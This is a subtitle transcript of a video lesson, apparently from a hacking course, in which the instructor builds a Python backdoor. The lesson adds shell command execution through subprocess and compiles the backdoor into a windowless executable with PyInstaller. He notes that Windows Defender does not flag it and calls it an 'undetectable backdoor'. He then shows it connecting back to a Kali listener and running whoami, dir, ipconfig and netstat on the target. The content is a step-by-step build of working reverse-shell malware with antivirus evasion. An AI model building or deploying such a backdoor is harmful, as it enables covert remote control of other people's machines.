1
00:00:00,840 --> 00:00:01,710
Instructor: Welcome back.

2
00:00:01,710 --> 00:00:04,920
Time to write the code that will execute our commands

3
00:00:04,920 --> 00:00:06,780
inside of our payload.

4
00:00:06,780 --> 00:00:08,189
So as I already mentioned,

5
00:00:08,189 --> 00:00:11,580
for this we're going to need an additional library.

6
00:00:11,580 --> 00:00:15,170
So go to your backdoor program and import subprocess.

7
00:00:16,110 --> 00:00:19,350
This library will allow us to execute any command

8
00:00:19,350 --> 00:00:21,030
that the server sends.

9
00:00:21,030 --> 00:00:22,620
Let's go down here,

10
00:00:22,620 --> 00:00:26,040
where we added the comment for the command execution.

11
00:00:26,040 --> 00:00:27,630
We can delete it right now,

12
00:00:27,630 --> 00:00:31,740
and to execute the command we can do something like this.

13
00:00:31,740 --> 00:00:34,500
We can initiate execute

14
00:00:34,500 --> 00:00:38,010
and we are going to equal that to the subprocess.Popen,

15
00:00:40,697 --> 00:00:43,020
and this stands for process open.

16
00:00:43,020 --> 00:00:45,180
This process open takes a few parameters,

17
00:00:45,180 --> 00:00:48,960
and the first one will be what we want to execute.

18
00:00:48,960 --> 00:00:53,430
In our case, we want to execute our command.

19
00:00:53,430 --> 00:00:57,010
The second parameter we can select to be shell equals True,

20
00:00:58,770 --> 00:01:00,690
and there are some additional parameters

21
00:01:00,690 --> 00:01:04,980
such as stdout equals subprocess.PIPE.

22
00:01:04,980 --> 00:01:06,780
And make sure that you type this PIPE

23
00:01:06,780 --> 00:01:08,103
in capital letters.

24
00:01:09,240 --> 00:01:14,240
Another parameter, stderr equals subprocess.PIPE,

25
00:01:15,690 --> 00:01:19,980
and the last one will be stdin equals subprocess.PIPE.

26
00:01:23,160 --> 00:01:24,600
These are all the parameters

27
00:01:24,600 --> 00:01:26,790
that we need to specify right here.
28
00:01:26,790 --> 00:01:28,200
The most important one is

29
00:01:28,200 --> 00:01:32,460
that you specify this command as the first argument.

30
00:01:32,460 --> 00:01:35,580
Once we initiate the process open onto the execute variable,

31
00:01:35,580 --> 00:01:38,790
we can create a variable called result

32
00:01:38,790 --> 00:01:43,650
that will be equal to execute.stdout.read.

33
00:01:43,650 --> 00:01:45,570
So we want to read the output.

34
00:01:45,570 --> 00:01:50,310
We're also going to concatenate to this the execute.stderr.read.

35
00:01:52,530 --> 00:01:53,820
So these are the two things

36
00:01:53,820 --> 00:01:56,520
that will give us the output of the command.

37
00:01:56,520 --> 00:01:59,490
Then we will store them inside of the result variable.

38
00:01:59,490 --> 00:02:03,870
And this line that I'm going to write right now

39
00:02:03,870 --> 00:02:05,370
could be a little bit tricky.

40
00:02:05,370 --> 00:02:06,960
Let me write it first.

41
00:02:06,960 --> 00:02:09,840
result.decode.

42
00:02:09,840 --> 00:02:12,390
You might be wondering why we are decoding this.

43
00:02:12,390 --> 00:02:17,390
Well, if I go up here in the reliable_send,

44
00:02:17,817 --> 00:02:19,860
we are going to encode our data,

45
00:02:19,860 --> 00:02:22,470
and this result is something that we're going to send

46
00:02:22,470 --> 00:02:24,030
in the next line.

47
00:02:24,030 --> 00:02:26,520
And once we perform these two lines,

48
00:02:26,520 --> 00:02:29,040
we already get encoded data.

49
00:02:29,040 --> 00:02:31,500
So if we don't decode it first

50
00:02:31,500 --> 00:02:34,050
and we try to send it straight away,

51
00:02:34,050 --> 00:02:35,730
it'll throw us an error.

52
00:02:35,730 --> 00:02:37,140
It'll not be able to do that

53
00:02:37,140 --> 00:02:40,950
because it is going to try to encode already encoded data.
54
00:02:40,950 --> 00:02:43,830
That's why first we must decode it right here,

55
00:02:43,830 --> 00:02:48,690
and then in the next line we're going to type reliable_send

56
00:02:48,690 --> 00:02:51,810
and we are going to send our result.

57
00:02:51,810 --> 00:02:55,440
Great, now that we did this, let us test our program.

58
00:02:55,440 --> 00:02:57,090
And to test this program,

59
00:02:57,090 --> 00:03:00,450
you're going to need a Windows environment to compile it,

60
00:03:00,450 --> 00:03:03,810
and you are going to need any version of Python 3.

61
00:03:03,810 --> 00:03:07,500
Now in my case, I'm using Python 3.7,

62
00:03:07,500 --> 00:03:09,450
so I would advise you to use the same version.

63
00:03:09,450 --> 00:03:13,320
So just download Python 3.7, because if it works for me

64
00:03:13,320 --> 00:03:15,393
it'll most likely work for you.

65
00:03:16,260 --> 00:03:17,430
After you do that,

66
00:03:17,430 --> 00:03:22,430
what we must do is we must copy our backdoor

67
00:03:22,500 --> 00:03:24,570
to our Windows 10 machine.

68
00:03:24,570 --> 00:03:27,840
Why? Well, we're going to compile it on a Windows machine.

69
00:03:27,840 --> 00:03:30,120
For this you can use a Windows virtual machine

70
00:03:30,120 --> 00:03:33,180
if you'd like, just make sure you download Python 3.7

71
00:03:33,180 --> 00:03:35,100
onto that Windows virtual machine.

72
00:03:35,100 --> 00:03:38,040
Once you do that, you can copy the backdoor.

73
00:03:38,040 --> 00:03:41,280
I am first going to copy it to my Kali Linux desktop.

74
00:03:41,280 --> 00:03:43,320
So home, mrhacker and then Desktop.

75
00:03:43,320 --> 00:03:46,030
And from the desktop I'm going to copy it

76
00:03:47,700 --> 00:03:51,660
onto the Windows 10 desktop.

77
00:03:51,660 --> 00:03:52,650
Great.

78
00:03:52,650 --> 00:03:55,530
Now that we copied it, we're going to need a few things

79
00:03:55,530 --> 00:03:57,510
in order to compile this program.
80
00:03:57,510 --> 00:03:58,380
So first of all,

81
00:03:58,380 --> 00:04:00,960
open your command prompt on your Windows machine,

82
00:04:00,960 --> 00:04:05,850
navigate to the directory where your backdoor is,

83
00:04:05,850 --> 00:04:07,710
and to compile this program,

84
00:04:07,710 --> 00:04:10,710
we are going to need the PyInstaller library.

85
00:04:10,710 --> 00:04:14,640
You can install that library using pip as usual.

86
00:04:14,640 --> 00:04:16,589
Once you get the PyInstaller library,

87
00:04:16,589 --> 00:04:18,959
you want to go to the directory where your backdoor is

88
00:04:18,959 --> 00:04:20,702
and type pyinstaller.

89
00:04:21,600 --> 00:04:24,840
Then the name of the program, in my case backdoor.py,

90
00:04:24,840 --> 00:04:27,390
and we're going to use two different arguments.

91
00:04:27,390 --> 00:04:31,143
One of them is --onefile and the other one is --noconsole.

92
00:04:32,970 --> 00:04:35,710
Once you specify all of this, press Enter,

93
00:04:36,900 --> 00:04:41,250
and this will compile our Python program for us.

94
00:04:41,250 --> 00:04:42,769
Now one thing to keep in mind is

95
00:04:42,769 --> 00:04:45,090
that you must have all the libraries

96
00:04:45,090 --> 00:04:48,060
from this program installed using pip

97
00:04:48,060 --> 00:04:51,660
in order for the compiling of the program to be successful.

98
00:04:51,660 --> 00:04:54,660
So in this case, our backdoor right here,

99
00:04:54,660 --> 00:04:57,550
if I edit it using Notepad,

100
00:04:59,310 --> 00:05:01,620
we only have these three libraries

101
00:05:01,620 --> 00:05:04,200
and all of them are already in Python by default.

102
00:05:04,200 --> 00:05:07,320
So there are no libraries that we must install yet.
103
00:05:07,320 --> 00:05:10,890
But in the future, if you keep adding onto this program

104
00:05:10,890 --> 00:05:12,300
and you add additional libraries

105
00:05:12,300 --> 00:05:15,570
that might not be installed in Python by default,

106
00:05:15,570 --> 00:05:18,270
you will need to install them first using pip,

107
00:05:18,270 --> 00:05:21,540
and then you can compile the program successfully.

108
00:05:21,540 --> 00:05:22,440
Okay, great.

109
00:05:22,440 --> 00:05:24,570
Now that we compiled the program,

110
00:05:24,570 --> 00:05:27,840
we're going to have these four folders.

111
00:05:27,840 --> 00:05:31,620
We're going to have the dist folder, this pycache folder,

112
00:05:31,620 --> 00:05:35,520
this backdoor.spec file and the build folder.

113
00:05:35,520 --> 00:05:38,790
These three right here you can delete straight away.

114
00:05:38,790 --> 00:05:39,870
We don't need them.

115
00:05:39,870 --> 00:05:44,010
And this dist folder will have our executable.

116
00:05:44,010 --> 00:05:44,970
Here it is.

117
00:05:44,970 --> 00:05:46,533
It is called backdoor.exe.

118
00:05:47,490 --> 00:05:49,110
And you know what the cool part is?

119
00:05:49,110 --> 00:05:53,980
If I scan it using the latest version of Windows Defender,

120
00:06:00,390 --> 00:06:01,410
here it is.

121
00:06:01,410 --> 00:06:03,300
Zero threats found.

122
00:06:03,300 --> 00:06:07,230
So we created an undetectable backdoor that we coded.

123
00:06:07,230 --> 00:06:08,610
Amazing, right?

124
00:06:08,610 --> 00:06:10,980
Now let's test it to see whether it works.

125
00:06:10,980 --> 00:06:12,750
The first thing that we must make sure of is

126
00:06:12,750 --> 00:06:15,900
that the IP addresses and the ports are set correctly,

127
00:06:15,900 --> 00:06:17,940
and that is something that we should have done

128
00:06:17,940 --> 00:06:19,980
before actually compiling the program.
129
00:06:19,980 --> 00:06:21,690
But in my case, I remember

130
00:06:21,690 --> 00:06:24,600
that I set 192.168.1.12

131
00:06:24,600 --> 00:06:26,730
to be the IP address of the Kali Linux machine

132
00:06:26,730 --> 00:06:30,420
and the port 5555 to be the port to connect to,

133
00:06:30,420 --> 00:06:32,040
which is, in my case, correct.

134
00:06:32,040 --> 00:06:33,480
So what I'm going to do

135
00:06:33,480 --> 00:06:37,380
is I'm going to use Python 3 to start my server.

136
00:06:37,380 --> 00:06:41,220
It'll print out listening for the incoming connections,

137
00:06:41,220 --> 00:06:44,650
and if I go right here and execute the backdoor.exe,

138
00:06:47,160 --> 00:06:49,560
nothing seems to be happening, but that is good.

139
00:06:49,560 --> 00:06:52,380
We don't want our program to open anything,

140
00:06:52,380 --> 00:06:56,160
but if we go back here and we wait a couple of seconds,

141
00:06:56,160 --> 00:06:59,340
because remember that we set the time.sleep command

142
00:06:59,340 --> 00:07:02,280
to be 20 seconds before actually connecting

143
00:07:02,280 --> 00:07:06,810
to our Kali Linux machine, and after 20 seconds here it is,

144
00:07:06,810 --> 00:07:09,930
we get the shell from our Windows 10 machine.

145
00:07:09,930 --> 00:07:12,780
We get Shell written, and then the IP address

146
00:07:12,780 --> 00:07:14,250
as well as the port

147
00:07:14,250 --> 00:07:16,800
from which the connection is coming.

148
00:07:16,800 --> 00:07:20,700
Now if we try to execute some of the command prompt commands

149
00:07:20,700 --> 00:07:23,940
such as, for example, whoami, it seems to be stuck,

150
00:07:23,940 --> 00:07:26,700
so there is something wrong with our code.

151
00:07:26,700 --> 00:07:29,730
Let us go and check our server first

152
00:07:29,730 --> 00:07:31,560
to see whether everything is good.

153
00:07:31,560 --> 00:07:35,250
So we got our reliable_send and reliable_receive functions.
154
00:07:35,250 --> 00:07:36,783
Everything seems to be good,

155
00:07:37,800 --> 00:07:40,980
but right here we reliable_receive the result

156
00:07:40,980 --> 00:07:42,630
and then we print it out.

157
00:07:42,630 --> 00:07:44,343
So this could be the problem.

158
00:07:45,780 --> 00:07:49,530
Let's check it out inside of our backdoor code as well,

159
00:07:49,530 --> 00:07:52,443
just to make sure that everything is good here.

160
00:07:54,660 --> 00:07:57,000
And after a few minutes of searching,

161
00:07:57,000 --> 00:07:58,380
I managed to find the error.

162
00:07:58,380 --> 00:08:01,890
So the error was inside of the backdoor code.

163
00:08:01,890 --> 00:08:03,720
The first thing that I didn't do is

164
00:08:03,720 --> 00:08:06,000
I didn't import this json library

165
00:08:06,000 --> 00:08:07,680
inside of my backdoor code.

166
00:08:07,680 --> 00:08:11,160
I only copied these two functions from the server code,

167
00:08:11,160 --> 00:08:14,010
but I forgot to import the json library.

168
00:08:14,010 --> 00:08:15,810
So that is the first thing that we must do.

169
00:08:15,810 --> 00:08:17,370
I already did it right here.

170
00:08:17,370 --> 00:08:22,080
And the second thing is the typo right here in this line:

171
00:08:22,080 --> 00:08:27,000
we typed rstip and it should be rstrip.

172
00:08:27,000 --> 00:08:32,000
We need to fix that both here and inside of the server code.

173
00:08:33,570 --> 00:08:38,570
So go down here and change the rstip into r and then strip.

174
00:08:39,659 --> 00:08:41,403
Save right here as well.

175
00:08:42,299 --> 00:08:46,470
And we are going to copy the backdoor.py

176
00:08:46,470 --> 00:08:48,990
to home, mrhacker and then Desktop.

177
00:08:48,990 --> 00:08:51,750
So we're going to recompile it once again.

178
00:08:51,750 --> 00:08:54,420
All of these things we do not need anymore,

179
00:08:54,420 --> 00:08:56,310
so I'm going to delete them.
180
00:08:56,310 --> 00:08:57,540
If it tells you right here

181
00:08:57,540 --> 00:09:01,350
that the file is currently in use, that is because we ran it,

182
00:09:01,350 --> 00:09:05,130
and to close it, we can go to Task Manager,

183
00:09:05,130 --> 00:09:07,740
find the backdoor.exe that is running

184
00:09:07,740 --> 00:09:10,860
and close it inside of our Task Manager.

185
00:09:10,860 --> 00:09:14,250
Then we should be able to delete the dist folder.

186
00:09:14,250 --> 00:09:15,083
Great.

187
00:09:15,083 --> 00:09:17,520
Now that we did that, what I'm going to do is

188
00:09:17,520 --> 00:09:22,520
I'm going to once again copy the backdoor.py onto my desktop,

189
00:09:23,490 --> 00:09:25,200
and I'm going to compile it once again

190
00:09:25,200 --> 00:09:26,520
using the command prompt.

191
00:09:26,520 --> 00:09:31,503
So pyinstaller backdoor.py --onefile --noconsole.

192
00:09:33,060 --> 00:09:33,993
Press Enter.

193
00:09:36,420 --> 00:09:39,780
While this is compiling, let us go to our Kali Linux machine

194
00:09:39,780 --> 00:09:44,610
and let us start our server, python3 server.py.

195
00:09:44,610 --> 00:09:46,560
It will listen for the incoming connections,

196
00:09:46,560 --> 00:09:47,820
and right here we can go

197
00:09:47,820 --> 00:09:51,453
to the dist directory and execute backdoor.exe.

198
00:09:53,520 --> 00:09:56,220
Once again, these other files we do not need.

199
00:09:56,220 --> 00:09:57,510
So you can delete them.

200
00:09:57,510 --> 00:09:59,943
Only leave this directory with the backdoor.exe.

201
00:10:01,380 --> 00:10:02,910
And in just a few seconds,

202
00:10:02,910 --> 00:10:04,320
we should receive the connection

203
00:10:04,320 --> 00:10:06,570
right here in our Kali Linux machine

204
00:10:06,570 --> 00:10:08,400
due to the timeout of 20 seconds

205
00:10:08,400 --> 00:10:10,320
that we coded inside of our program.

206
00:10:10,320 --> 00:10:14,340
And if I type whoami right now, it works.
207
00:10:14,340 --> 00:10:16,680
I can execute commands on the target machine.

208
00:10:16,680 --> 00:10:18,870
If I type dir, it will tell me

209
00:10:18,870 --> 00:10:22,260
that the only file in the directory is backdoor.exe.

210
00:10:22,260 --> 00:10:24,390
And that is because we are currently inside

211
00:10:24,390 --> 00:10:26,580
of this dist directory.

212
00:10:26,580 --> 00:10:31,290
If I type ipconfig, it'll tell me my IP address.

213
00:10:31,290 --> 00:10:35,370
I can type the netstat command to get the netstat output,

214
00:10:35,370 --> 00:10:37,680
where it'll tell me all of my current connections

215
00:10:37,680 --> 00:10:39,570
on that target machine.

216
00:10:39,570 --> 00:10:43,380
But if I, for example, try to go one step back,

217
00:10:43,380 --> 00:10:45,150
this will not work.

218
00:10:45,150 --> 00:10:47,850
I will still be in the dist directory.

219
00:10:47,850 --> 00:10:50,130
So it seems that our program works

220
00:10:50,130 --> 00:10:53,130
and we can execute the commands, but for now we can't seem to

221
00:10:53,130 --> 00:10:56,220
change into a different directory,

222
00:10:56,220 --> 00:10:58,860
and that is something that we must see how to fix

223
00:10:58,860 --> 00:11:00,660
in the next video.

224
00:11:00,660 --> 00:11:02,820
But for now, it is good that it works.

225
00:11:02,820 --> 00:11:05,550
We saw how we can compile the program to an exe

226
00:11:05,550 --> 00:11:06,870
using PyInstaller.

227
00:11:06,870 --> 00:11:11,758
So once again, just install Python 3.7 on a Windows machine,

228
00:11:11,758 --> 00:11:15,150
install PyInstaller for that Python,

229
00:11:15,150 --> 00:11:16,839
and install all the libraries

230
00:11:16,839 --> 00:11:19,260
that you're using inside of your program.
231
00:11:19,260 --> 00:11:21,960
In our case, we are not using any additional libraries

232
00:11:21,960 --> 00:11:23,700
outside of the standard Python libraries,

233
00:11:23,700 --> 00:11:25,350
so we didn't need to do that.

234
00:11:25,350 --> 00:11:28,347
The only thing we needed to do was to install PyInstaller

235
00:11:28,347 --> 00:11:29,891
and then use the command:

236
00:11:29,891 --> 00:11:34,891
pyinstaller, the program name, and --onefile and --noconsole as options.

237
00:11:35,250 --> 00:11:38,160
And this should compile the program for you.

238
00:11:38,160 --> 00:11:40,560
Once you execute it, it should connect to the server

239
00:11:40,560 --> 00:11:42,660
that we are running from our Kali Linux machine.

240
00:11:42,660 --> 00:11:45,660
Let us test the quit command. If I press Enter,

241
00:11:45,660 --> 00:11:48,270
it closes the program right here in our terminal,

242
00:11:48,270 --> 00:11:51,270
but does it also close the program in Task Manager?

243
00:11:51,270 --> 00:11:52,413
Let us check it out.

244
00:11:54,660 --> 00:11:56,190
And it indeed does.

245
00:11:56,190 --> 00:11:58,320
So we also closed the program

246
00:11:58,320 --> 00:12:01,350
on the target machine with the quit command.

247
00:12:01,350 --> 00:12:02,183
Great.

248
00:12:02,183 --> 00:12:03,870
In the next video we're going to see how

249
00:12:03,870 --> 00:12:07,083
we can successfully change directories using our program.